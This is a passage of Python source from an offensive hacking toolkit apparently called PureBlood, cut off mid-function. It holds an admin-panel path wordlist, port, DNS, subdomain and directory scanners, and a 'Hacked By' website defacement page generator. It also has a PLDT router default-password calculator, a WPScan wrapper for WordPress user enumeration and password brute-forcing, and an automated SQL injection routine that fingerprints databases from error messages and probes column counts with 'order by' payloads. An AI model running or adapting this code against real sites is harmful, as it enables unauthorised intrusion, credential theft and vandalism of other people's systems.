elif datetime.date.today().strftime("%w") == 3 or datetime.date.today().strftime("%w") == '3':
day = 'Wednesday'
elif datetime.date.today().strftime("%w") == 4 or datetime.date.today().strftime("%w") == '4':
day = 'Thursday'
elif datetime.date.today().strftime("%w") == 5 or datetime.date.today().strftime("%w") == '5':
day = 'Friday'
elif datetime.date.today().strftime("%w") == 6 or datetime.date.today().strftime("%w") == '6':
day = 'Saturday'
elif datetime.date.today().strftime("%w") == 7 or datetime.date.today().strftime("%w") == '0':
day = 'Sunday'
mday = datetime.date.today().strftime("%d")
year = datetime.date.today().strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')
## List
ids = [
'NONE','A','NS','MD','MF','CNAME','SOA','MB','MG','MR','NULL','WKS','PTR','HINFO','MINFO','MX','TXT','RP','AFSDB','X25','ISDN','RT','NSAP','NSAP-PTR','SIG','KEY','PX','GPOS','AAAA','LOC','NXT','SRV','NAPTR','KX','CERT','A6','DNAME','OPT','APL','DS','SSHFP','IPSECKEY','RRSIG','NSEC','DNSKEY','DHCID','NSEC3','NSEC3PARAM','TLSA','HIP','CDS','CDNSKEY','CSYNC','SPF','UNSPEC','EUI48','EUI64','TKEY','TSIG','IXFR','AXFR','MAILB','MAILA','ANY','URI','CAA','TA','DLV'
]
admin_panel_list = ['/admin.aspx','/admin.asp','/admin.php','/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php','/joomla/administrator','/login.php','/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html','/admin/login.html','/admin/admin.html','/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html','/admin/controlpanel.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html','webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html','/admin/cp.php','cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php','/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php','/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/modelsearch/login.php','/moderator.php','/moderator/login.php','/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php','/admin/adminLogin.html','/adminLogin.html','/admin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html','/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','cp.html','/adminpanel.php','/moderator.html','/administrator/index.html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html','/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html','/admincontrol/login.html','/adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html','/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/adminarea/index.php','/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php','/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php','adm/index.php','adm.php','affiliate.php','/adm_auth.php ','/memberadmin.php','/administratorlogin.php','/login/admin.asp','/admin/login.asp','/administratorlogin.asp','/login/asmindstrator.asp','/admin/login.aspx','/login/admin.aspx','/administartorlogin.aspx','login/administrator.aspx','/adminlogin.asp','a/dminlogin.aspx','/admin_login.asp','/admin_login.aspx','/adminhome.asp','/adminhome.aspx''/administrator_login.asp','/administrator_login.aspx']
admin_panel_valid = []
dbms_errors = {
'MySQL': (r'SQL syntax.*MySQL', r'Warning.*mysql_.*', r'MySQL Query fail.*', r'SQL syntax.*MariaDB server'),
'PostgreSQL': (r'PostgreSQL.*ERROR', r'Warning.*\Wpg_.*', r'Warning.*PostgreSQL'),
'Microsoft SQL Server': (r'OLE DB.* SQL Server', r'(\W|\A)SQL Server.*Driver', r'Warning.*odbc_.*', r'Warning.*mssql_', r'Msg \d+, Level \d+, State \d+', r'Unclosed quotation mark after the character string', r'Microsoft OLE DB Provider for ODBC Drivers'),
'Microsoft Access': (r'Microsoft Access Driver', r'Access Database Engine', r'Microsoft JET Database Engine', r'.*Syntax error.*query expression'),
'Oracle': (r'\bORA-[0-9][0-9][0-9][0-9]', r'Oracle error', r'Warning.*oci_.*', 'Microsoft OLE DB Provider for Oracle'),
'IBM DB2': (r'CLI Driver.*DB2', r'DB2 SQL error'),
'SQLite': (r'SQLite/JDBCDriver', r'System.Data.SQLite.SQLiteException'),
'Informix': (r'Warning.*ibase_.*', r'com.informix.jdbc'),
'Sybase': (r'Warning.*sybase.*', r'Sybase message')
}
## Threading Object Funtions
def TCP_connect(ip, port_number, delay, output):
TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
TCPsock.settimeout(delay)
try:
TCPsock.connect((ip, port_number))
output[port_number] = 'Open'
except:
output[port_number] = ''
def dns_record_scanner(drs_hostname, ids_item, dns_record_list):
try:
answers = dns.resolver.query(drs_hostname, ids_item)
for rdata in answers:
ids_item = str(ids_item); rdata = str(rdata)
dns_record_list.append(str(ids_item + ' : ' + rdata))
except Exception:
pass
def subdomain_scanner(subdomain, so_200, so_301, so_302, so_403):
subdomain = 'http://' + subdomain
try:
subdomain_scanner_request = requests.get(subdomain)
subdomain_scanner_code = subdomain_scanner_request.status_code
if subdomain_scanner_code == 200:
so_200.append(subdomain)
elif subdomain_scanner_code == 301:
so_301.append(subdomain)
elif subdomain_scanner_code == 302:
so_302.append(subdomain)
elif subdomain_scanner_code == 403:
so_403.append(subdomain)
except ConnectionError:
pass
def directory_scanner(ds_url_list, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3):
try:
directory_fuzz_request = requests.get(ds_url_list)
if directory_fuzz_request.status_code == 200:
directory_fuzz_final1.append(ds_url_list)
elif directory_fuzz_request.status_code == 301 or directory_fuzz_request.status_code == 302:
directory_fuzz_final2.append(ds_url_list)
elif directory_fuzz_request.status_code == 403:
directory_fuzz_final3.append(ds_url_list)
except:
pass
def file_scanner(fs_url_list, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3):
try:
file_fuzz_request = requests.get(fs_url_list)
if file_fuzz_request.status_code == 200:
file_fuzz_final1.append(fs_url_list)
elif file_fuzz_request.status_code == 301 or file_fuzz_request.status_code == 302:
file_fuzz_final2.append(fs_url_list)
elif file_fuzz_request.status_code == 403:
file_fuzz_final3.append(fs_url_list)
except:
pass
# END GLOBAL
#########################################################################################################################################################
class Generator:
def deface_page(self, title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups):
deface_page_template = '''
<html>
<head>
<title>--=[ Hacked By {0} ]=--</title>
<meta charset=\"UTF-8\">
<link rel=\"SHORTCUT ICON\" href=\"{1}\">
<meta name=\"Author\" content=\"Cr4sHCoD3 | PureHackers x Blood Security Hackers\"/>
<meta name=\"copyright\" content=\"PureHackers | Blood Security Hackers\"/>
<meta name=\"description\" content=\"{2}.\"/> <!-- Change this -->
<meta name=\"keywords\" content=\"Hacked, Pawned, Defaced, Security, PureHackers, Blood Security Hackers, PureBlood, Cr4sHCoD3\"/> <!-- Change this -->
<meta property=\"og:title\" content=\"Hacked By {0}\"/>
<meta property=\"og:image\" content=\"{3}\"> <!-- Change this -->
<style>
{9} url(\"https://cr4shcod3.github.io/python/pureblood/pureblood.css\");
</style>
</head>
<body>
<div class=\"bg\">
<center>
<img src=\"{4}\" class=\"logo\"/> <!-- Change This -->
<h1 class=\"header glitch\" data-text=\"Hacked By {5}\">Hacked By {5}</h1><br><br>
<p class=\"message\">{6}</p>
<p class=\"message\">{7}</p><br><br>
<p class=\"groups\">Greetings: {8}</p>
</center>
</div>
</body>
</html>
'''.format(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups, '@import')
self.deface_page_result = deface_page_template
return self.deface_page_result
def password_generator(self, length, text):
password_generator_final1 = ''
password_generator_final2 = ''
password_generator_final3 = ''
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-_=+[{}];:\'"\|,<.>/?`~'
for i in range(length):
char_random = random.choice(chars)
password_generator_final1 += char_random
password_generator_final2 = hashlib.md5(text.encode('utf-8')).hexdigest()
l33t_alphabet = ['4','8','(','|)','3','|=','9','#','1','_|','|<','|_','|\/|','|\|','0','|D','(,)','|2','$','7','|_|','\/','\/\/','><','\'/','(/)']
for i in text:
if i == 'a' or i == 'A':
text = text.replace('a', l33t_alphabet[0]).replace('A', l33t_alphabet[0])
elif i == 'b' or i == 'B':
text = text.replace('b', l33t_alphabet[1]).replace('B', l33t_alphabet[1])
elif i == 'c' or i == 'C':
text = text.replace('c', l33t_alphabet[2]).replace('C', l33t_alphabet[2])
elif i == 'd' or i == 'D':
text = text.replace('d', l33t_alphabet[3]).replace('D', l33t_alphabet[3])
elif i == 'e' or i == 'E':
text = text.replace('e', l33t_alphabet[4]).replace('E', l33t_alphabet[4])
elif i == 'f' or i == 'F':
text = text.replace('f', l33t_alphabet[5]).replace('F', l33t_alphabet[5])
elif i == 'g' or i == 'G':
text = text.replace('g', l33t_alphabet[6]).replace('G', l33t_alphabet[6])
elif i == 'h' or i == 'H':
text = text.replace('h', l33t_alphabet[7]).replace('H', l33t_alphabet[7])
elif i == 'i' or i == 'I':
text = text.replace('i', l33t_alphabet[8]).replace('I', l33t_alphabet[8])
elif i == 'j' or i == 'J':
text = text.replace('j', l33t_alphabet[9]).replace('J', l33t_alphabet[9])
elif i == 'k' or i == 'K':
text = text.replace('k', l33t_alphabet[10]).replace('K', l33t_alphabet[10])
elif i == 'l' or i == 'L':
text = text.replace('l', l33t_alphabet[11]).replace('L', l33t_alphabet[11])
elif i == 'm' or i == 'M':
text = text.replace('m', l33t_alphabet[12]).replace('M', l33t_alphabet[12])
elif i == 'n' or i == 'N':
text = text.replace('n', l33t_alphabet[13]).replace('N', l33t_alphabet[13])
elif i == 'o' or i == 'O':
text = text.replace('o', l33t_alphabet[14]).replace('O', l33t_alphabet[14])
elif i == 'p' or i == 'P':
text = text.replace('p', l33t_alphabet[15]).replace('P', l33t_alphabet[15])
elif i == 'q' or i == 'Q':
text = text.replace('q', l33t_alphabet[16]).replace('Q', l33t_alphabet[16])
elif i == 'r' or i == 'R':
text = text.replace('r', l33t_alphabet[17]).replace('R', l33t_alphabet[17])
elif i == 's' or i == 'S':
text = text.replace('s', l33t_alphabet[18]).replace('S', l33t_alphabet[18])
elif i == 't' or i == 'T':
text = text.replace('t', l33t_alphabet[19]).replace('T', l33t_alphabet[19])
elif i == 'u' or i == 'U':
text = text.replace('u', l33t_alphabet[20]).replace('U', l33t_alphabet[20])
elif i == 'v' or i == 'V':
text = text.replace('v', l33t_alphabet[21]).replace('V', l33t_alphabet[21])
elif i == 'w' or i == 'W':
text = text.replace('w', l33t_alphabet[22]).replace('W', l33t_alphabet[22])
elif i == 'x' or i == 'X':
text = text.replace('x', l33t_alphabet[23]).replace('X', l33t_alphabet[23])
elif i == 'y' or i == 'Y':
text = text.replace('y', l33t_alphabet[24]).replace('Y', l33t_alphabet[24])
elif i == 'z' or i == 'Z':
text = text.replace('z', l33t_alphabet[25]).replace('Z', l33t_alphabet[25])
password_generator_final3 = text
self.password_generator_result1 = password_generator_final1
self.password_generator_result2 = password_generator_final2
self.password_generator_result3 = password_generator_final3
return self.password_generator_result1, self.password_generator_result2, self.password_generator_result3
def pldt_password_calculator(self, digit5, mac5):
pldt_password_calculator_final1 = ['PLDTWIFI' + digit5, 'pldtwifi'+ digit5]
pldt_password_calculator_final2_multiply = digit5 * 3
pldt_password_calculator_final2 = ['PLDTWIFI' + pldt_password_calculator_final2_multiply, 'pldtwifi' + pldt_password_calculator_final2_multiply]
digit55 = digit5
for i in digit55:
if i == '0':
digit55.replace('0', 'f')
elif i == '4':
digit55.replace('4', 'b')
elif i == '8':
digit55.replace('8', '7')
elif i == 'c':
digit55.replace('c', '3')
elif i == '1':
digit55.replace('1', 'e')
elif i == '5':
digit55.replace('5', 'a')
elif i == '9':
digit55.replace('9', '6')
elif i == 'd':
digit55.replace('d', '2')
elif i == '2':
digit55.replace('2', 'd')
elif i == '6':
digit55.replace('6', '9')
elif i == 'a':
digit55.replace('a', '5')
elif i == 'e':
digit55.replace('e', '1')
elif i == '3':
digit55.replace('3', 'c')
elif i == '7':
digit55.replace('7', '8')
elif i == 'b':
digit55.replace('b', '4')
elif i == 'f':
digit55.replace('f', '0')
pldt_password_calculator_final3 = 'wlan' + digit55
pldt_password_calculator_final4 = ['PLDTWIFI' + digit55, 'pldtwifi' + digit55]
pldt_password_calculator_final5 = 'HomeBro_' + mac5
self.pldt_password_calculator_result1 = pldt_password_calculator_final1
self.pldt_password_calculator_result2 = pldt_password_calculator_final2
self.pldt_password_calculator_result3 = pldt_password_calculator_final3
self.pldt_password_calculator_result4 = pldt_password_calculator_final4
self.pldt_password_calculator_result5 = pldt_password_calculator_final5
return self.pldt_password_calculator_result1, self.pldt_password_calculator_result2, self.pldt_password_calculator_result3, self.pldt_password_calculator_result4, self.pldt_password_calculator_result5
def text_to_hash(self, text):
md5_final = hashlib.md5(text.encode('utf-8')).hexdigest()
sha1_final = hashlib.sha1(text.encode('utf-8')).hexdigest()
sha224_final = hashlib.sha224(text.encode('utf-8')).hexdigest()
sha256_final = hashlib.sha256(text.encode('utf-8')).hexdigest()
sha384_final = hashlib.sha384(text.encode('utf-8')).hexdigest()
sha512_final = hashlib.sha512(text.encode('utf-8')).hexdigest()
md4 = hashlib.new('md4')
md4.update(text.encode('utf-8'))
md4_final = md4.hexdigest()
ripemd160 = hashlib.new('ripemd160')
ripemd160.update(text.encode('utf-8'))
ripemd160_final = ripemd160.hexdigest()
whirlpool = hashlib.new('whirlpool')
whirlpool.update(text.encode('utf-8'))
whirlpool_final = whirlpool.hexdigest()
text_to_hash_final = """
Text To Hash Result:
[+] MD4: {0}
[+] MD5: {1}
[+] SHA1: {2}
[+] SHA224: {3}
[+] SHA256: {4}
[+] SHA384: {5}
[+] SHA512: {6}
[+] RipeMD160: {7}
[+] Whirlpool: {8}
""".format(md4_final, md5_final, sha1_final, sha224_final, sha256_final, sha384_final, sha512_final, ripemd160_final, whirlpool_final)
self.text_to_hash_result = text_to_hash_final
return self.text_to_hash_result
class WebApplicationAttack:
def wp_scan(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
elif wp_scan_test_ruby_command == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
def wp_scan_bruteforce(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
elif wp_scan_test_ruby_command == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
def auto_sql_injection(self, url):
print ('[#] - Auto SQL Injection Running on -> {0}'.format(url))
auto_sql_injection_request_origin = requests.get(url)
auto_sql_injection_request_origin_html = BeautifulSoup(auto_sql_injection_request_origin.text, 'html.parser')
auto_sql_injection_request_origin_html_h1 = auto_sql_injection_request_origin_html.find_all('h1')
auto_sql_injection_request_origin_html_h2 = auto_sql_injection_request_origin_html.find_all('h2')
auto_sql_injection_request_origin_html_h3 = auto_sql_injection_request_origin_html.find_all('h3')
auto_sql_injection_request_origin_html_p = auto_sql_injection_request_origin_html.find_all('p')
print ('[~] - Checking If Vulnerable')
auto_sql_injection_request = requests.get('{0}\''.format(url))
auto_sql_injection_request_url = '{0}\''.format(url)
auto_sql_injection_request_result = ''
auto_sql_injection_request_i = ''
if auto_sql_injection_request.status_code == 200:
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(auto_sql_injection_request.text):
error = re.compile(error)
auto_sql_injection_request_result = 'Vulnerable1'
print ('[+] - Vulnerable: Database -> ({0})'.format(db))
if auto_sql_injection_request_result == '':
if auto_sql_injection_request_origin.text != auto_sql_injection_request.text:
auto_sql_injection_request_result = 'Vulnerable2'
print ('[+] - Vulnerable: NO Syntax Error')
elif auto_sql_injection_request.status_code == 403:
print ('[!] - Not Vulnerable!')
elif auto_sql_injection_request.status_code == 406:
print ('[!] - Not Vulnerable!')
if auto_sql_injection_request_result == 'Vulnerable1':
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
if ' order by 1--' in auto_sql_injection_request_orderby.text or 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, '100'))
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
elif 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err2'
else:
auto_sql_injection_orderby_result = 'err3'
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err2':
if 'mysql_fetch_row()' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
